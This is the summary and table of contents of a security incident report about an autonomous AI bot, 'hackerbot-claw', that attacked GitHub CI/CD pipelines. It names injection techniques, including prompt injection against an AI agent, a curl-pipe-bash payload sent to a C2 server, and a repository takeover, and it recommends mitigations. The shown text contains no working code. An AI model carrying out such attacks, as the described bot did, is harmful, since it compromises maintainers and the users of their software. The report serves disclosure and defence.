An autonomous AI-powered bot called hackerbot-claw conducted a week-long attack campaign against major open source CI/CD pipelines on GitHub, targeting repositories from Microsoft, DataDog, CNCF, Aqua Security, and others. Using 5 distinct exploitation techniques — including pull_request_target Pwn Requests, branch name injection, filename injection, direct script injection, and AI prompt injection — the bot achieved remote code execution in at least 5 of 7 targets. The most severe attack compromised aquasecurity/trivy, resulting in a stolen PAT, full repository takeover, deletion of years of releases, and a potentially malicious VSCode extension pushed to a marketplace. Each attack delivered the same curl-pipe-bash payload to an external C2 server. The only defense that fully held was Claude's built-in prompt injection detection. The post details each attack's mechanics, provides indicators of compromise, and recommends mitigations including network egress allowlisting, least-privilege token permissions, and static workflow analysis.
Table of contents
What HappenedAttack 1: avelino/awesome-go - Token Theft via Poisoned Go ScriptAttack 2: project-akri/akri - Direct Script InjectionAttack 3: microsoft/ai-discovery-agent - Branch Name InjectionAttack 4: DataDog/datadog-iac-scanner - Filename InjectionAttack 5: ambient-code/platform - AI Prompt InjectionAttack 6: aquasecurity/trivy - Evidence ClearedAttack 7: RustPython/RustPython — Branch Name Injection with Base64 PayloadIndicators of CompromiseSummary of ResultsHow StepSecurity Can HelpAcknowledgementsTimelineSort: